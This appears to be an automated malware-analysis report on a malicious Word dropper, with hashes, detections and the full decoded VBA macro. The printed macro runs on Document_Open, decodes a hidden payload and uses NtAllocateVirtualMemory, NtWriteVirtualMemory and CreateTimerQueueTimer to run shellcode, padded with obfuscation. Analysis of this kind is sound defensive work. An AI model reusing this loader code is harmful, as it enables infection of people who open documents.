Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 025fda9d7cafd219…

MALICIOUS

Office (OLE)

Size: 212.5 KB
Created: 2017-10-04 13:28:00
Authoring application: Microsoft Office Word
First seen: 2017-10-10
MD5: 3cea3a68326d3847d9346079a95ad13d
SHA-1: 2371de2a73319a0adf024cbdb6841efcafae190a
SHA-256: 025fda9d7cafd219263eed912ee1559331aa93bfdbc375e5c2a8d5843a9376ba
Risk Score: 90

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6339045-0. It contains VBA macros, including a Document_Open macro, which are commonly used to download and execute further malicious content. The obfuscated nature of the VBA code suggests an attempt to evade detection, and the presence of a Document_Open macro indicates an intent to execute automatically upon opening the document.

Heuristics (4)

  • ClamAV: Doc.Dropper.Agent-6339045-0 (severity: critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6339045-0
  • VBA macros detected (severity: medium, 1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro (severity: low) OLE_VBA_DOCOPEN
    Document_Open macro
    Matched lines in script:
    Private Sub Document_Open()
    Dim dutifulness As String
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs extracted, each found in document text (OLE body):
    • http://ns.adobe.com/xap/1.0/
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/photoshop/1.0/
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#
    • http://schemas.openxmlformats.org/drawingml/2006/main

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13809 bytes
SHA-256: 193912f6717a5b2d853a70a65573e4715f1a971d361abda0788bd2e66010440a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Function aloof(afterburner)
Dim certainty As String
Dim jackpudding As Byte
Dim sandstone As Integer
Dim sportsman As Variant
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim axseed As Integer
Dim charlatism As LongPtr
colima = 6 - 60 + 62
Dim fluting As LongPtr
Dim obligational As Integer
Dim dawn As Long
Dim aggrandizement As LongPtr
Dim depart As Variant
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim charlatism As Long
colima = 33 - 106 + 77
Dim fluting As Long
Dim aggrandizement As Long
#End If
gavial = VarPtr(charlatism)
lorgnette = percept(gavial, VarPtr(afterburner) + 8, colima)
actinomycete = 10 - 67 + 56
fluting = 20 - 9 - 11
fendre = 64 - 58 - 6
aggrandizement = 19 - 35 + 9755
badaud = 100 - 87 + 4083
demimonde = 104 - 41 + 1
catalase = autotelism(ByVal actinomycete, _
fluting, ByVal fendre, aggrandizement, ByVal badaud, _
ByVal demimonde)
latin = latin And 237

spleenly = spleenly - 368

percept fluting, charlatism, 54 - 7 + 5836
captious = 30 + 10
landscape = 23360 + 10
insight = 322880 + 5
 Pmt 0, captious, 9587, 49096, 7

aloof = fluting
End Function

Sub restlessly()
Dim conch As Long
Dim vegetate As Long
clinker.battlescarred.Value = Day(#12/5/2013#)
varday = oh = "luniform"
Wrap = "pasteup"
kniphofia = "scarf"
accipitres = flannelbush
harms = "phon"

coastguard = "colitis"
maintenance = "ambloplites"
Set mandevilla = clinker.battlescarred.SelectedItem
anagogical = 68
anobiidae = 37289
eelworm = 173043
 Pmt 0, anagogical, 25759, 17704, 2

balarama = mandevilla.Name
arrows = 22 - 113 + 7935
newsboy = Right(balarama, arrows)
dignus = abfarad(newsboy)
aristotelean = 51
castor = 22201
bugbear = 301431
 Pmt 0, aristotelean, 34196, 57133, 2

angelicanism = "kingcraft"
distributary = "dean"
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim degenerate As Variant
Dim ch As LongPtr
Dim darkroom As LongPtr
Dim hygre As Integer
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim breachloader As Byte
Dim darkroom As Long
Dim overcredulity As Long
Dim ch As Long
#End If
shapeup = 118 - 64 - 54
conation = accompli
some = 106 - 6 + 3996
agronomic = 116
haitian = 14002
cornfed = 423471
 Pmt 0, agronomic, 38493, 18024, 5

probitas = "footmark"
suffocation = bloat
unscrupulousness = 85
derv = 38166
zoomastigote = 188577
 Pmt 0, unscrupulousness, 16744, 26392, 6

aired = dignus
lennoaceae = "unconscious"
thomas = "ptosis"
ch = aloof(aired)
epizoan = "elver"
yesterdays = "algebraically"
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim desole As Long
Dim chromosphere As LongPtr
Dim diabolatry As LongPtr
Dim algebraic As LongPtr
brooch = 68 - 42 + 2038
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim chromosphere As Long
divertissement = 82 - 34 + 733
Dim diabolatry As Long
Dim algebraic As Long
brooch = divertissement + 3459

#End If
Dim judge As String
Dim reputedly As Long
chromosphere = 27 - 119 + 92
darkroom = ch + brooch
diabolatry = 128 - 12 + 201411
algebraic = 88 - 87 + 3499
planchment = oppugnation(diabolatry, chromosphere, darkroom, chromosphere, chromosphere, chromosphere, chromosphere)
archpriest = 87
intrinsic = 21596
aby = 393884
 Pmt 0, archpriest, 28778, 43219, 4

End Sub


Function percept(answerable, actinism, carbonic)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
Dim parts As String
Dim aeroplane As String
Dim montes As LongPtr
Dim tollgate As LongPtr
Dim cataclysm As LongPtr
Dim ensign As Variant
Dim arresting As LongPtr
Dim hardtack As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim tollgate As Long
Dim cutters As Variant
Dim montes As Long
Dim accurse As String
Dim arresting As Long
Dim anestrous As Integer
Dim cataclysm As Long
Dim neencephalon As Long
Dim hardtack As Long
Dim naemorhedus As Variant
Dim struma As Integer
#End If
latin = latin * 4
branchiopoda = branchiopoda
tollgate = answerable
hardtack = carbonic
branchiopoda = "untimeliness"
arresting = actinism
mimosa = 110
auricularia = 4959
heartwounding = 580088
 Pmt 0, mimosa, 38923, 11310, 8

branchiopoda = branchiopoda
montes = 90 - 34 - 57
voxfaucibus ByVal montes, tollgate, arresting, hardtack, cataclysm
spleenly = Rnd(153)
End Function

Private Sub Document_Open()
Dim dutifulness As String
Dim badness As Byte
electrobiology = gentry
precolumbian = "enchilada"
restlessly
pissoir = 30 + 4
physiology = 14810 + 2
granulomatous = 172810 + 5
 Pmt 0, pissoir, 13732, 59254, 3
End Sub

Attribute VB_Name = "reconcile"
'  And hit me like a hurricane
'  I was doing alright
#If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then
'  The moon went hiding, stars quit shining
'  I wouldnt be in my truck
Public Declare PtrSafe Function chaldron Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal alliaceae As Any, unsaluted As Any, appetent As Any, predetermination As Any) As LongPtr
'  Rain was driving, thunder, lightning
'  Baby, without warning
Public Declare PtrSafe Function dita Lib "Shlwapi.dll" Alias "CreateFileWrapW" (euterpe As LongPtr) As LongPtr
'  Knew it was gonna be a long night
'  Driving us to your house
Public Declare PtrSafe Function oppugnation Lib "Kernel32" Alias _
  "CreateTimerQueueTimer" (spectacle As Any, ByVal congou As Any, ByVal deodand As Any, ByVal scarabaeus As Any, ByVal civilly As Any, ByVal ecstacy As Any, ByVal coalescing As Any) As Long
'  And hit me like a hurricane
'  I was doing alright
Public Declare PtrSafe Function blastopore Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal earnestly As Any, agapanthus As Any, underpart As Any, fuego As Any) As LongPtr
'  But just your sight had my heart storming
'  Hit me like a hurricane
Public Declare PtrSafe Function sonorousness Lib "ntdll.dll" Alias "NtCreateEventPair" (outwork As LongPtr, outspeak As LongPtr, poca As LongPtr) As LongPtr
'  I was doing alright
'  Rain was driving, thunder, lightning
Public Declare PtrSafe Function autotelism Lib "Ntdll.dll  " Alias _
  "NtAllocateVirtualMemory" (oxyuridae As LongPtr, bee As LongPtr, ByVal gelsemium As LongPtr, stylishlyByVal As LongPtr, nevadan As LongPtr, ByVal convincement As LongPtr) As LongPtr
'  If I woulda just layed my drink down
'  If I woulda just layed my drink down
Public Declare PtrSafe Function voxfaucibus Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal battle As Any, ByVal experimentist As Any, ByVal addlehead As Any, ByVal cattleman As Any, ByVal citroncolored As Any) As LongPtr
'  And hit me like a hurricane
'  And walked out
Public Declare PtrSafe Function circuition Lib "Kernel32.dll" Alias "CreateEventW" (ByVal zizania As LongPtr, dimensional As LongPtr, metallurgical As LongPtr, unbranched As LongPtr, botanize As LongPtr) As Long
'  You wrecked my whole world when you came
'  Baby, without warning
#End If
'  We locked eyes over whiskey on ice
'  I was doing alright
#If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then
'  Started talking bout us again
'  I was doing alright
Public Declare Function alright Lib "ntdll.dll" Alias "NtCreateEventPair" (keble As Long, hemimorphite As Long, draggletail As Long) As Long
'  And hit me like a hurricane'  But just your sight had my heart storming
Public Declare Function disjoined Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal threelegged As Any, emitter As Any, colleagueship As Any, dactylomancy As Any) As Long
'  Started talking bout us again
'  The moon went hiding, stars quit shining
Public Declare Function classic Lib "Kernel32.dll" Alias "CreateEventW" (ByVal commedy As Long, carouser As Long, plenum As Long, euripus As Long, misnomer As Long) As Long
'  But just your sight had my heart storming
'  Rain was driving, thunder, lightning
Public Declare Function autotelism Lib "Ntdll.dll " Alias _
  "NtAllocateVirtualMemory" (schrod As Long, mortgaged As Long, ByVal baggageman As Long, acquaintanceByVal As Long, defunct As Long, ByVal guardhouse As Long) As Long
'  Knew it was gonna be a long night
'  I was doing alright
Public Declare Function oppugnation Lib "Kernel32" Alias _
  "CreateTimerQueueTimer" (bedclothes As Any, ByVal nganasan As Any, ByVal jettison As Any, ByVal cordiality As Any, ByVal cumulation As Any, ByVal streaked As Any, ByVal litterateur As Any) As Long
'  And hit me like a hurricane'  But you rolled in with your hair in the wind
Public Declare Function voxfaucibus Lib "Ntdll.dll   " Alias "NtWriteVirtualMemory" (ByVal both As Any, ByVal claws As Any, ByVal carangid As Any, ByVal bosky As Any, ByVal barrels As Any) As Long
'  I wouldnt be in my truck
'  And hit me like a hurricane
Public Declare Function organismal Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal coryphantha As Any, bedevilment As Any, soliloquize As Any, encircling As Any) As Long
'  Baby, without warning
'  From the moment when
#End If
'  The moon went hiding, stars quit shining
'  And hit me like a hurricane




Attribute VB_Name = "clinker"
Attribute VB_Base = "0{7BF18BC1-95FB-4A37-AB75-B16CF9259AA1}{2599CCA8-F00A-4022-9E53-B372ED7FC2FD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "azodule"
Function allectation()
Dim millenium(255) As Byte
becripple = 93 - 19 - 9
Do While becripple <= 90 + 1
millenium(becripple) = becripple - 65
becripple = becripple + 1
Loop
becripple = 48
Do While becripple <= 50 + 8
millenium(becripple) = becripple + 4
becripple = becripple + 1
Loop
becripple = 97
Do While becripple <= 120 + 3
millenium(becripple) = becripple - 71
becripple = becripple + 1
Loop
millenium(47) = 63
becripple = 43
millenium(becripple) = 60 + 2
allectation = millenium
End Function
Function peach(logarithmically, hasdrubal, agapemone)
Select Case agapemone
Case 34 + (10 / 2 - 5)
peach = logarithmically \ hasdrubal
Case 44 + (5 - 3) / 2 - 1
peach = logarithmically And hasdrubal
Case 52 + (56 / 7 - 4 * 2)
peach = logarithmically * hasdrubal
End Select
End Function
Function recollection(sweat)
recollection = AscW(sweat)
End Function
Function abfarad(maxwell) As String
Dim cheilitis As String
Dim autobahn As Long
Dim sociobiologic As String

Dim hemic As Long
Dim emulate As Integer

Dim chaparajos() As Byte
Dim astrodome(63) As Long
Dim stridulation As String

Dim obtrude As Long
Dim ene As Integer
Dim senate As Long
Dim arrant(6962) As Byte
branchiopoda = sprinkle

latin = latin And 92

Dim uncommonness As Integer

Dim basel(63) As Long
latin = Rnd(483)

Dim blackface(63) As Long
trillionth = 13 - 75 + 4094
Dim qatari As String

Dim jalapeno As Long

duel = 116 - 99 + 47
francophobe = 16 - 49 + 262177
Dim biogenic As Byte

felucca = 111 - 70 + 214
whitefly = 11 - 111 + 16711780
eheu = 44 - 4 + 216
slog = 13 - 82 + 258117
acrocarp = 10 - 118 + 65388
kazan = 13 - 48 + 16515107
inexperience = 98 - 80 + 65518
elevator = 79 - 49 + 33
chalcocite = 11 - 65 + 4150
Dim spheres As Byte
thermojunction = 116 - 86 - 30
bison = 96 - 29 + 7776
Dim geniality() As Byte
Dim bedless As Integer
Dim bucerotidae As Variant
geniality = VBA.StrConv(maxwell, 128)
Dim exuviae As String
blatta = 47
congridae = 15344
popillia = 135995
 Pmt 0, blatta, 31632, 27778, 2

domesman = 7843
aristocrat = vbKeyShift - 12
For defaced = 0 To domesman
If defaced Mod 2 = 0 Then
geniality(defaced) = geniality(defaced) - aristocrat
Else
geniality(defaced) = geniality(defaced) - (aristocrat - 1)
End If
Next defaced
creceipts = 102
bigfoot = 2604
hurriedly = 127145
 Pmt 0, creceipts, 37803, 56254, 5

ene = 0
nixon = 101 - 19 - 82
lwei = 4 - 100 + 139
cordovan = allectation
For senate = (7 - 7) * 1 To (50 + 13) * (5 - 4)
basel(senate) = peach(senate, duel, 52)
blackface(senate) = peach(senate, chalcocite, 52)
astrodome(senate) = peach(senate, francophobe, 52)
Next senate
elaeis = 7
advances = 4760
acarine = 586069
 Pmt 0, elaeis, 5489, 48202, 6

chaparajos = geniality
namely = 110 - 125 + 19
denominate = 43
standard = 13157
made = 217660
 Pmt 0, denominate, 26064, 50935, 5

corkwood = 10 - 31 + 24
sprinkle = branchiopoda

sprinkle = sprinkle

fascinating = corkwood + 1
endoparasitic = 126 - 29 - 95
For hemic = 0 To domesman
colliquation = chaparajos(hemic)
madagascan = chaparajos(hemic + 2)
epikeratophakia = blackface(cordovan(chaparajos(hemic + 1)))
fractiously = basel(cordovan(madagascan)) + cordovan(chaparajos(hemic + corkwood))
autobahn = astrodome(cordovan(colliquation)) + epikeratophakia + fractiously
senate = peach(autobahn, whitefly, 44)
arrant(obtrude) = peach(senate, inexperience, 34)
senate = peach(autobahn, acrocarp, 44)
arrant(obtrude + 1) = peach(senate, eheu, 34)
arrant(obtrude + endoparasitic) = peach(autobahn, felucca, 44)
obtrude = obtrude + endoparasitic + 1
hemic = hemic + 3
Next
abfarad = arrant
End Function

Sub max()
With Documents("Example.doc").Windows(1)
If .WindowState = wdWindowStateMinimize Then _
.WindowState = wdWindowStateMaximize
End With
End Sub